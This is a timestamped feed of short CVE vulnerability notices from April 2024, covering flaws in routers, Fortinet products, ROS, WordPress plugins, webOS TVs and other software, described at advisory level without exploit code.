🚨 CVE-2023-49906A stack-based buffer overflow vulnerability exists in the web interface Radio Scheduling functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.This vulnerability refers specifically to the overflow that occurs via the `ssid` parameter at offset `0x0045ab7c` of the `httpd_portal` binary shipped with v5.1.0 Build 20220926 of the EAP225.🎖@cveNotify |
|
| 2024-04-09 15:37:48 |
🚨 CVE-2023-49134A command execution vulnerability exists in the tddpd enable_test_mode functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926 and Tp-Link N300 Wireless Access Point (EAP115 V4) v5.0.4 Build 20220216. A specially crafted series of network requests can lead to arbitrary command execution. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability.This vulnerability impacts `uclited` on the EAP115(V4) 5.0.4 Build 20220216 of the N300 Wireless Gigabit Access Point.🎖@cveNotify |
|
| 2024-04-09 15:37:44 |
🚨 CVE-2023-48784A use of externally-controlled format string vulnerability [CWE-134] in FortiOS version 7.4.1 and below, version 7.2.7 and below, version 7.0.14 and below, version 6.4.15 and below command line interface may allow a local privileged attacker with super-admin profile and CLI access to execute arbitrary code or commands via specially crafted requests.🎖@cveNotify |
|
| 2024-04-09 15:37:43 |
🚨 CVE-2023-47542A improper neutralization of special elements used in a template engine [CWE-1336] in FortiManager versions 7.4.1 and below, versions 7.2.4 and below, and 7.0.10 and below allows attacker to execute unauthorized code or commands via specially crafted templates.🎖@cveNotify |
|
| 2024-04-09 15:37:39 |
🚨 CVE-2023-47540An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSandbox version 4.4.0 through 4.4.2 and 4.2.0 through 4.2.6 and 4.0.0 through 4.0.5 and 3.2.0 through 3.2.4 and 3.0.5 through 3.0.7 may allows attacker to execute unauthorized code or commands via CLI.🎖@cveNotify |
|
| 2024-04-09 15:37:38 |
🚨 CVE-2023-41677A insufficiently protected credentials in Fortinet FortiProxy 7.4.0, 7.2.0 through 7.2.6, 7.0.0 through 7.0.12, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7, Fortinet FortiOS 7.4.0 through 7.4.1, 7.2.0 through 7.2.6, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17 allows attacker to execute unauthorized code or commands via targeted social engineering attack🎖@cveNotify |
|
| 2024-04-09 15:37:37 |
🚨 CVE-2022-0001Non-transparent sharing of branch predictor selectors between contexts in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2024-04-09 14:37:58 |
🚨 CVE-2024-28234Contao is an open source content management system. Starting in version 2.0.0 and prior to versions 4.13.40 and 5.3.4, it is possible to inject CSS styles via BBCode in comments. Installations are only affected if BBCode is enabled. Contao versions 4.13.40 and 5.3.4 have a patch for this issue. As a workaround, disable BBCode for comments.🎖@cveNotify |
|
| 2024-04-09 14:37:57 |
🚨 CVE-2024-28191Contao is an open source content management system. Starting in version 4.0.0 and prior to version 4.13.40 and 5.3.4, it is possible to inject insert tags in frontend forms if the output is structured in a very specific way. Contao versions 4.13.40 and 5.3.4 have a patch for this issue. As a workaround, do not output user data from frontend forms next to each other, always separate them by at least one character.🎖@cveNotify |
|
| 2024-04-09 14:37:54 |
🚨 CVE-2024-28190Contao is an open source content management system. Starting in version 4.0.0 and prior to version 4.13.40 and 5.3.4, users can inject malicious code in filenames when uploading files (back end and front end), which is then executed in tooltips and popups in the back end. Contao versions 4.13.40 and 5.3.4 have a patch for this issue. As a workaround, remove upload fields from frontend forms and disable uploads for untrusted back end users.🎖@cveNotify |
|
| 2024-04-09 14:37:53 |
🚨 CVE-2023-6319A command injection vulnerability exists in the getAudioMetadata method from the com.webos.service.attachedstoragemanager service on webOS version 4 through 7. A series of specially crafted requests can lead to command execution as the root user. An attacker can make authenticated requests to trigger this vulnerability. * webOS 4.9.7 - 5.30.40 running on LG43UM7000PLA * webOS 5.5.0 - 04.50.51 running on OLED55CXPUA * webOS 6.3.3-442 (kisscurl-kinglake) - 03.36.50 running on OLED48C1PUB * webOS 7.3.1-43 (mullet-mebin) - 03.33.85 running on OLED55A23LA🎖@cveNotify |
|
| 2024-04-09 14:37:52 |
🚨 CVE-2023-6317A prompt bypass exists in the secondscreen.gateway service running on webOS version 4 through 7. An attacker can create a privileged account without asking the user for the security PIN. Full versions and TV models affected:webOS 4.9.7 - 5.30.40 running on LG43UM7000PLA webOS 5.5.0 - 04.50.51 running on OLED55CXPUA webOS 6.3.3-442 (kisscurl-kinglake) - 03.36.50 running on OLED48C1PUB webOS 7.3.1-43 (mullet-mebin) - 03.33.85 running on OLED55A23LA🎖@cveNotify |
|
| 2024-04-09 14:33:14 |
None |
|
| 2024-04-09 13:37:26 |
🚨 CVE-2024-31544A stored cross-site scripting (XSS) vulnerability in Computer Laboratory Management System v1.0 allows attackers to execute arbitrary JavaScript code by including malicious payloads into “remarks”, “borrower_name”, “faculty_department” parameters in /classes/Master.php?f=save_record.🎖@cveNotify |
|
| 2024-04-09 13:37:25 |
🚨 CVE-2024-2223An Incorrect Regular Expression vulnerability in Bitdefender GravityZone Update Server allows an attacker to cause a Server Side Request Forgery and reconfigure the relay. This issue affects the following products that include the vulnerable component: Bitdefender Endpoint Security for Linux version 7.0.5.200089Bitdefender Endpoint Security for Windows version 7.9.9.380GravityZone Control Center (On Premises) version 6.36.1🎖@cveNotify |
|
| 2024-04-09 13:37:24 |
🚨 CVE-2022-3671A vulnerability classified as critical was found in SourceCodester eLearning System 1.0. This vulnerability affects unknown code of the file /admin/students/manage.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-212014 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-09 13:07:42 |
🚨 CVE-2024-24279An issue in secdiskapp 1.5.1 (management program for NewQ Fingerprint Encryption Super Speed Flash Disk) allows attackers to gain escalated privileges via vsVerifyPassword and vsSetFingerPrintPower functions.🎖@cveNotify |
|
| 2024-04-09 13:07:35 |
🚨 CVE-2024-23086Apfloat v1.10.1 was discovered to contain a stack overflow via the component org.apfloat.internal.DoubleModMath::modPow(double.🎖@cveNotify |
|
| 2024-04-09 13:07:34 |
🚨 CVE-2024-28224Ollama before 0.1.29 has a DNS rebinding vulnerability that can inadvertently allow remote access to the full API, thereby letting an unauthorized user chat with a large language model, delete a model, or cause a denial of service (resource exhaustion).🎖@cveNotify |
|
| 2024-04-09 12:37:28 |
🚨 CVE-2024-1300A vulnerability in the Eclipse Vert.x toolkit causes a memory leak in TCP servers configured with TLS and SNI support. When processing an unknown SNI server name assigned the default certificate instead of a mapped certificate, the SSL context is erroneously cached in the server name map, leading to memory exhaustion. This flaw allows attackers to send TLS client hello messages with fake server names, triggering a JVM out-of-memory error.🎖@cveNotify |
|
| 2024-04-09 12:37:27 |
🚨 CVE-2024-1023A vulnerability in the Eclipse Vert.x toolkit results in a memory leak due to using Netty FastThreadLocal data structures. Specifically, when the Vert.x HTTP client establishes connections to different hosts, triggering the memory leak. The leak can be accelerated with intimate runtime knowledge, allowing an attacker to exploit this vulnerability. For instance, a server accepting arbitrary internet addresses could serve as an attack vector by connecting to these addresses, thereby accelerating the memory leak.🎖@cveNotify |
|
| 2024-04-09 11:37:24 |
🚨 CVE-2024-31863Authentication Bypass by Spoofing vulnerability by replacing to exsiting notes in Apache Zeppelin.This issue affects Apache Zeppelin: from 0.10.1 before 0.11.0.Users are recommended to upgrade to version 0.11.0, which fixes the issue.🎖@cveNotify |
|
| 2024-04-09 10:37:25 |
🚨 CVE-2022-47894Improper Input Validation vulnerability in Apache Zeppelin SAP.This issue affects Apache Zeppelin SAP: from 0.8.0 before 0.11.0.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.For more information, the fix already was merged in the source code but Zeppelin decided to retire the SAP componentNOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-04-09 10:37:24 |
🚨 CVE-2021-28656Cross-Site Request Forgery (CSRF) vulnerability in Credential page of Apache Zeppelin allows an attacker to submit malicious request. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions.🎖@cveNotify |
|
| 2024-04-09 08:37:42 |
🚨 CVE-2024-31366Missing Authorization vulnerability in Themify Post Type Builder (PTB).This issue affects Post Type Builder (PTB): from n/a through 2.0.8.🎖@cveNotify |
|
| 2024-04-09 08:37:41 |
🚨 CVE-2024-30701An insecure logging vulnerability in ROS2 Galactic Geochelone ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to obtain sensitive information via inadequate security measures implemented within the logging mechanisms of ROS2.🎖@cveNotify |
|
| 2024-04-09 08:37:37 |
🚨 CVE-2024-30696OS command injection vulnerability in ROS2 Galactic Geochelone in ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows remote attackers to execute arbitrary code, escalate privileges, and obtain sensitive information via the command processing or system call components in ROS2, including External Command Execution Modules, System Call Handlers, and Interface Scripts.🎖@cveNotify |
|
| 2024-04-09 08:37:36 |
🚨 CVE-2024-30694A shell injection vulnerability was discovered in ROS2 (Robot Operating System 2) Galactic Geochelone ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code, escalate privileges, and obtain sensitive information due to the way ROS2 handles shell command execution in components like command interpreters or interfaces that process external inputs.🎖@cveNotify |
|
| 2024-04-09 07:37:25 |
🚨 CVE-2024-30691An issue was discovered in ROS2 Galactic Geochelone in version ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows remote attackers to execute arbitrary code, escalate privileges, obtain sensitive information, and gain unauthorized access to multiple ROS2 nodes.🎖@cveNotify |
|
| 2024-04-09 07:37:24 |
🚨 CVE-2024-1233A flaw was found in` JwtValidator.resolvePublicKey` in JBoss EAP, where the validator checks jku and sends a HTTP request. During this process, no whitelisting or other filtering behavior is performed on the destination URL address, which may result in a server-side request forgery (SSRF) vulnerability.🎖@cveNotify |
|
| 2024-04-09 06:37:24 |
🚨 CVE-2023-52425libexpat through 2.5.0 allows a denial of service (resource consumption) because many full reparsings are required in the case of a large token for which multiple buffer fills are needed.🎖@cveNotify |
|
| 2024-04-09 05:37:25 |
🚨 CVE-2024-30686An issue was discovered in ROS2 Iron Irwini versions ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows remote attackers to execute arbitrary code via packages or nodes within the ROS2 system.🎖@cveNotify |
|
| 2024-04-09 05:37:24 |
🚨 CVE-2024-1664The Responsive Gallery Grid WordPress plugin before 2.3.11 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-04-09 04:37:25 |
🚨 CVE-2024-30681An OS command injection vulnerability has been discovered in ROS2 Iron Irwini version ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code, escalate privileges, and obtain sensitive information via the command processing or system call components in ROS2.🎖@cveNotify |
|
| 2024-04-09 04:37:24 |
🚨 CVE-2024-30679An issue was discovered in the default configurations of ROS2 Iron Irwini ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows unauthenticated attackers to authenticate using default credentials.🎖@cveNotify |
|
| 2024-04-09 03:37:24 |
🚨 CVE-2024-30676A Denial-of-Service (DoS) vulnerability exists in ROS2 Iron Irwini versions where ROS_VERSION is 2 and ROS_PYTHON_VERSION is 3. A malicious user could potentially exploit this vulnerability remotely to crash the ROS2 nodes, thereby causing a denial of service. The flaw allows an attacker to cause unexpected behavior in the operation of ROS2 nodes, which leads to their failure and interrupts the regular operation of the system, thus making it unavailable for its intended users.🎖@cveNotify |
|
| 2024-04-09 01:37:32 |
🚨 CVE-2024-28167SAP Group Reporting Data Collection does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. On successful exploitation, specific data can be changed via the Enter Package Data app although the user does not have sufficient authorization causing high impact on Integrity of the appliction.🎖@cveNotify |
|
| 2024-04-09 01:37:25 |
🚨 CVE-2024-27899Self-Registration and Modify your own profile in User Admin Application of NetWeaver AS Java does not enforce proper security requirements for the content of the newly defined security answer. This can be leveraged by an attacker to cause profound impact on confidentiality and low impact on both integrity and availability.🎖@cveNotify |
|
| 2024-04-09 01:37:24 |
🚨 CVE-2024-25646Due to improper validation, SAP BusinessObject Business Intelligence Launch Pad allows an authenticated attacker to access operating system information using crafted document. On successful exploitation there could be a considerable impact on confidentiality of the application.🎖@cveNotify |
|
| 2024-04-08 23:37:29 |
🚨 CVE-2024-31047An issue in Academy Software Foundation openexr v.3.2.3 and before allows a local attacker to cause a denial of service (DoS) via the convert function of exrmultipart.cpp.🎖@cveNotify |
|
| 2024-04-08 23:37:26 |
🚨 CVE-2024-23584The NMAP Importer service may expose data store credentials to authorized users of the Windows Registry.🎖@cveNotify |
|
| 2024-04-08 23:37:25 |
🚨 CVE-2024-23081ThreeTen Backport v1.6.8 was discovered to contain a NullPointerException via the component org.threeten.bp.LocalDate::compareTo(ChronoLocalDate).🎖@cveNotify |
|
| 2024-04-08 23:37:24 |
🚨 CVE-2024-22949JFreeChart v1.5.4 was discovered to contain a NullPointerException via the component /chart/annotations/CategoryLineAnnotation.🎖@cveNotify |
|
| 2024-04-08 23:07:33 |
🚨 CVE-2024-31137In JetBrains TeamCity before 2024.03 reflected XSS was possible via Space connection configuration🎖@cveNotify |
|
| 2024-04-08 23:07:27 |
🚨 CVE-2024-31135In JetBrains TeamCity before 2024.03 open redirect was possible on the login page🎖@cveNotify |
|
| 2024-04-08 23:07:26 |
🚨 CVE-2023-40551A flaw was found in the MZ binary format in Shim. An out-of-bounds read may occur, leading to a crash or possible exposure of sensitive data during the system's boot phase.🎖@cveNotify |
|
| 2024-04-08 23:07:25 |
🚨 CVE-2020-12695The Open Connectivity Foundation UPnP specification before 2020-04-17 does not forbid the acceptance of a subscription request with a delivery URL on a different network segment than the fully qualified event-subscription URL, aka the CallStranger issue.🎖@cveNotify |
|
| 2024-04-08 22:37:25 |
🚨 CVE-2024-0083NVIDIA ChatRTX for Windows contains a vulnerability in the UI, where an attacker can cause a cross-site scripting error by network by running malicious scripts in users' browsers. A successful exploit of this vulnerability might lead to code execution, denial of service, and information disclosure.🎖@cveNotify |
|
| 2024-04-08 22:37:24 |
🚨 CVE-2024-0082NVIDIA ChatRTX for Windows contains a vulnerability in the UI, where an attacker can cause improper privilege management by sending open file requests to the application. A successful exploit of this vulnerability might lead to local escalation of privileges, information disclosure, and data tampering🎖@cveNotify |
|
| 2024-04-08 21:37:25 |
🚨 CVE-2024-27631Cross Site Request Forgery vulnerability in GNU Savane v.3.12 and before allows a remote attacker to escalate privileges via siteadmin/usergroup.php🎖@cveNotify |
|
| 2024-04-08 21:37:24 |
🚨 CVE-2024-27630Insecure Direct Object Reference (IDOR) in GNU Savane v.3.12 and before allows a remote attacker to delete arbitrary files via crafted input to the trackers_data_delete_file function.🎖@cveNotify |
|
| 2024-04-08 20:37:32 |
🚨 CVE-2024-3464A vulnerability was found in SourceCodester Laundry Management System 1.0 and classified as critical. This issue affects the function laporan_filter of the file /application/controller/Pelanggan.php. The manipulation of the argument jeniskelamin leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259745 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-08 20:37:26 |
🚨 CVE-2024-3463A vulnerability has been found in SourceCodester Laundry Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /karyawan/edit. The manipulation of the argument karyawan leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259744.🎖@cveNotify |
|
| 2024-04-08 20:37:25 |
🚨 CVE-2024-23085Apfloat v1.10.1 was discovered to contain a NullPointerException via the component org.apfloat.internal.DoubleScramble::scramble(double[], int, int[]).🎖@cveNotify |
|
| 2024-04-08 20:37:24 |
🚨 CVE-2024-23078JGraphT Core v1.5.2 was discovered to contain a NullPointerException via the component org.jgrapht.alg.util.ToleranceDoubleComparator::compare(Double, Double).🎖@cveNotify |
|
| 2024-04-08 19:37:24 |
🚨 CVE-2024-28224Ollama before 0.1.29 has a DNS rebinding vulnerability that can inadvertently allow remote access to the full API, thereby letting an unauthorized user chat with a large language model, delete a model, or cause a denial of service (resource exhaustion).🎖@cveNotify |
|
| 2024-04-08 19:07:26 |
🚨 CVE-2023-5692WordPress Core is vulnerable to Sensitive Information Exposure in versions up to, and including, 6.4.3 via the redirect_guess_404_permalink function. This can allow unauthenticated attackers to expose the slug of a custom post whose 'publicly_queryable' post status has been set to 'false'.🎖@cveNotify |
|
| 2024-04-08 18:37:31 |
🚨 CVE-2024-3458A vulnerability classified as critical was found in Netentsec NS-ASG Application Security Gateway 6.3. This vulnerability affects unknown code of the file /admin/add_ikev2.php. The manipulation of the argument TunnelId leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259714 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-08 18:37:30 |
🚨 CVE-2024-23082ThreeTen Backport v1.6.8 was discovered to contain an integer overflow via the component org.threeten.bp.format.DateTimeFormatter::parse(CharSequence, ParsePosition).🎖@cveNotify |
|
| 2024-04-08 18:37:26 |
🚨 CVE-2024-1958The WPB Show Core WordPress plugin before 2.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin or unauthenticated users🎖@cveNotify |
|
| 2024-04-08 18:37:25 |
🚨 CVE-2024-2509The Gutenberg Blocks by Kadence Blocks WordPress plugin before 3.2.26 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-04-08 18:37:24 |
🚨 CVE-2024-2369The Page Builder Gutenberg Blocks WordPress plugin before 3.1.7 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-04-08 17:37:24 |
🚨 CVE-2024-3456A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/config_Anticrack.php. The manipulation of the argument GroupId leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259712.🎖@cveNotify |
|
| 2024-04-08 16:37:27 |
🚨 CVE-2024-3445A vulnerability was found in SourceCodester Laundry Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /karyawan/laporan_filter. The manipulation of the argument data_karyawan leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259702 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-08 16:37:26 |
🚨 CVE-2024-31442Redon Hub is a Roblox Product Delivery Bot, also known as a Hub. In all hubs before version 1.0.2, all commands are capable of being ran by all users, including admin commands. This allows users to receive products for free and delete/create/update products/tags/etc. The only non-affected command is `/products admin clear` as this was already programmed for bot owners only. All users should upgrade to version 1.0.2 to receive a patch.🎖@cveNotify |
|
| 2024-04-08 16:37:25 |
🚨 CVE-2024-31224GPT Academic provides interactive interfaces for large language models. A vulnerability was found in gpt_academic versions 3.64 through 3.73. The server deserializes untrustworthy data from the client, which may risk remote code execution. Any device that exposes the GPT Academic service to the Internet is vulnerable. Version 3.74 contains a patch for the issue. There are no known workarounds aside from upgrading to a patched version.🎖@cveNotify |
|
| 2024-04-08 15:37:31 |
🚨 CVE-2024-3444A vulnerability was found in Wangshen SecGate 3600 up to 20240408. It has been classified as critical. This affects an unknown part of the file /?g=net_pro_keyword_import_save. The manipulation of the argument reqfile leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259701 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-08 15:37:27 |
🚨 CVE-2024-3442A vulnerability classified as critical has been found in SourceCodester Prison Management System 1.0. This affects an unknown part of the file /Employee/delete_leave.php. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259695.🎖@cveNotify |
|
| 2024-04-08 15:37:26 |
🚨 CVE-2024-31205Saleor is an e-commerce platform. Starting in version 3.10.0 and prior to versions 3.14.64, 3.15.39, 3.16.39, 3.17.35, 3.18.31, and 3.19.19, an attacker may bypass cross-set request forgery (CSRF) validation when calling refresh token mutation with empty string. When a user provides an empty string in `refreshToken` mutation, while the token persists in `JWT_REFRESH_TOKEN_COOKIE_NAME` cookie, application omits validation against CSRF token and returns valid access token. Versions 3.14.64, 3.15.39, 3.16.39, 3.17.35, 3.18.31, and 3.19.19 contain a patch for the issue. As a workaround, one may replace `saleor.graphql.account.mutations.authentication.refresh_token.py.get_refresh_token`. This will fix the issue, but be aware, that it returns `JWT_MISSING_TOKEN` instead of `JWT_INVALID_TOKEN`.🎖@cveNotify |
|
| 2024-04-08 15:37:25 |
🚨 CVE-2024-30269DataEase, an open source data visualization and analysis tool, has a database configuration information exposure vulnerability prior to version 2.5.0. Visiting the `/de2api/engine/getEngine;.js` path via a browser reveals that the platform's database configuration is returned. The vulnerability has been fixed in v2.5.0. No known workarounds are available aside from upgrading.🎖@cveNotify |
|
| 2024-04-08 14:37:25 |
🚨 CVE-2024-2511Issue summary: Some non-default TLS server configurations can cause unboundedmemory growth when processing TLSv1.3 sessionsImpact summary: An attacker may exploit certain server configurations to triggerunbounded memory growth that would lead to a Denial of ServiceThis problem can occur in TLSv1.3 if the non-default SSL_OP_NO_TICKET option isbeing used (but not if early_data support is also configured and the defaultanti-replay protection is in use). In this case, under certain conditions, thesession cache can get into an incorrect state and it will fail to flush properlyas it fills. The session cache will continue to grow in an unbounded manner. Amalicious client could deliberately create the scenario for this failure toforce a Denial of Service. It may also happen by accident in normal operation.This issue only affects TLS servers supporting TLSv1.3. It does not affect TLSclients.The FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue. OpenSSL1.0.2 is also not affected by this issue.🎖@cveNotify |
|
| 2024-04-08 14:37:24 |
🚨 CVE-2024-28732An issue was discovered in OFPMatch in parser.py in Faucet SDN Ryu version 4.34, allows remote attackers to cause a denial of service (DoS) (infinite loop).🎖@cveNotify |
|
| 2024-04-08 13:37:38 |
🚨 CVE-2024-31812In TOTOLINK EX200 V4.0.3c.7646_B20201211, an attacker can obtain sensitive information without authorization through the function getWiFiExtenderConfig.🎖@cveNotify |
|
| 2024-04-08 13:37:32 |
🚨 CVE-2024-31811TOTOLINK EX200 V4.0.3c.7646_B20201211 was discovered to contain a remote code execution (RCE) vulnerability via the langType parameter in the setLanguageCfg function.🎖@cveNotify |
|
| 2024-04-08 13:37:31 |
🚨 CVE-2024-31808TOTOLINK EX200 V4.0.3c.7646_B20201211 was discovered to contain a remote code execution (RCE) vulnerability via the webWlanIdx parameter in the setWebWlanIdx function.🎖@cveNotify |
|
| 2024-04-08 13:37:30 |
🚨 CVE-2024-31806TOTOLINK EX200 V4.0.3c.7646_B20201211 was discovered to contain a Denial-of-Service (DoS) vulnerability in the RebootSystem function which can reboot the system without authorization.🎖@cveNotify |
|
| 2024-04-08 13:37:27 |
🚨 CVE-2024-31805TOTOLINK EX200 V4.0.3c.7646_B20201211 allows attackers to start the Telnet service without authorization via the telnet_enabled parameter in the setTelnetCfg function.🎖@cveNotify |
|
| 2024-04-08 13:37:26 |
🚨 CVE-2024-2834A Stored Cross-Site Scripting (XSS) vulnerability has been identified in OpenText ArcSight Management Center and ArcSight Platform. The vulnerability could be remotely exploited.🎖@cveNotify |
|
| 2024-04-08 13:37:25 |
🚨 CVE-2014-125111A vulnerability was found in namithjawahar Wp-Insert up to 2.0.8 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 2.0.9 is able to address this issue. The name of the patch is a07b7b08084b9b85859f3968ce7fde0fd1fcbba3. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-259628.🎖@cveNotify |
|
| 2024-04-08 13:37:24 |
🚨 CVE-2011-10006A vulnerability was found in GamerZ WP-PostRatings up to 1.64. It has been classified as problematic. This affects an unknown part of the file wp-postratings.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 1.65 is able to address this issue. The identifier of the patch is 6182a5682b12369ced0becd3b505439ce2eb8132. It is recommended to upgrade the affected component. The identifier VDB-259629 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-08 12:37:26 |
🚨 CVE-2024-26574Insecure Permissions vulnerability in Wondershare Filmora v.13.0.51 allows a local attacker to execute arbitrary code via a crafted script to the WSNativePushService.exe🎖@cveNotify |
|
| 2024-04-08 12:37:25 |
🚨 CVE-2024-24746Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in Apache NimBLE. Specially crafted GATT operation can cause infinite loop in GATT server leading to denial of service in Bluetooth stack or device.This issue affects Apache NimBLE: through 1.6.0.Users are recommended to upgrade to version 1.7.0, which fixes the issue.🎖@cveNotify |
|
| 2024-04-08 10:37:41 |
🚨 CVE-2024-27896Input verification vulnerability in the log module.Impact: Successful exploitation of this vulnerability can affect integrity.🎖@cveNotify |
|
| 2024-04-08 10:37:37 |
🚨 CVE-2024-26811In the Linux kernel, the following vulnerability has been resolved:ksmbd: validate payload size in ipc responseIf installing malicious ksmbd-tools, ksmbd.mountd can return invalid ipcresponse to ksmbd kernel server. ksmbd should validate payload size ofipc response from ksmbd.mountd to avoid memory overrun orslab-out-of-bounds. This patch validate 3 ipc response that has payload.🎖@cveNotify |
|
| 2024-04-08 10:37:36 |
🚨 CVE-2023-52364Vulnerability of input parameters being not strictly verified in the RSMC module.Impact: Successful exploitation of this vulnerability may cause out-of-bounds write.🎖@cveNotify |
|
| 2024-04-08 08:37:25 |
🚨 CVE-2024-30672Arbitrary file upload vulnerability in ROS (Robot Operating System) Melodic Morenia in ROS_VERSION 1 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code, cause a denial of service (DoS), and obtain sensitive information via the file upload component.🎖@cveNotify |
|
| 2024-04-08 08:37:24 |
🚨 CVE-2024-30667Insecure deserialization vulnerability in ROS (Robot Operating System) Melodic Morenia in ROS_VERSION 1 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code or obtain sensitive information via crafted input to the data handling components.🎖@cveNotify |
|
| 2024-04-08 07:37:32 |
🚨 CVE-2024-30666A buffer overflow vulnerability has been discovered in the C++ components of ROS (Robot Operating System) Melodic Morenia in ROS_VERSION 1 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code via improper handling of arrays or strings within these components.🎖@cveNotify |
|
| 2024-04-08 07:37:26 |
🚨 CVE-2024-30665An OS command injection vulnerability has been discovered in ROS (Robot Operating System) Melodic Morenia in ROS_VERSION 1 and ROS_PYTHON_VERSION 3. This vulnerability primarily affects the command processing or system call components in ROS, making them susceptible to manipulation by malicious entities. Through this, unauthorized commands can be executed, leading to remote code execution (RCE), data theft, and malicious activities. The affected components include External Command Execution Modules, System Call Handlers, and Interface Scripts.🎖@cveNotify |
|
| 2024-04-08 07:37:25 |
🚨 CVE-2024-30662An issue was discovered in ROS (Robot Operating System) Melodic Morenia in ROS_VERSION 1 and ROS_PYTHON_VERSION 3, where the system transmits messages in plaintext. This flaw exposes sensitive information, making it vulnerable to man-in-the-middle (MitM) attacks, and allowing attackers to easily intercept and access this data.🎖@cveNotify |
|
| 2024-04-08 07:37:24 |
🚨 CVE-2024-30659Shell Injection vulnerability in ROS (Robot Operating System) Melodic Morenia versions ROS_VERSION 1 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code, escalate privileges, and obtain sensitive information.🎖@cveNotify |
|
| 2024-04-08 06:37:25 |
🚨 CVE-2024-27488Incorrect Access Control vulnerability in ZLMediaKit versions 1.0 through 8.0, allows remote attackers to escalate privileges and obtain sensitive information. The application system enables the http API interface by default and uses the secret parameter method to authenticate the http restful api interface, but the secret is hardcoded by default.🎖@cveNotify |
|
| 2024-04-08 05:37:32 |
🚨 CVE-2024-1958The wpb-show-core WordPress plugin before 2.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin or unauthenticated users🎖@cveNotify |
|
| 2024-04-08 05:37:26 |
🚨 CVE-2024-1956The wpb-show-core WordPress plugin before 2.7 does not sanitise and escape the parameters before outputting it back in the response of an unauthenticated request, leading to a Reflected Cross-Site Scripting🎖@cveNotify |
|
| 2024-04-08 05:37:25 |
🚨 CVE-2024-1588The SendPress Newsletters WordPress plugin through 1.23.11.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-04-08 05:37:24 |
🚨 CVE-2024-1292The wpb-show-core WordPress plugin before 2.6 does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-04-08 03:37:45 |
🚨 CVE-2024-23658In camera driver, there is a possible use after free due to a logic error. This could lead to local denial of service with System execution privileges needed🎖@cveNotify |
|
| 2024-04-08 03:37:44 |
🚨 CVE-2023-52536In faceid service, there is a possible out of bounds read due to a missing bounds check. This could lead to local denial of service with System execution privileges needed🎖@cveNotify |
|
| 2024-04-08 03:37:41 |
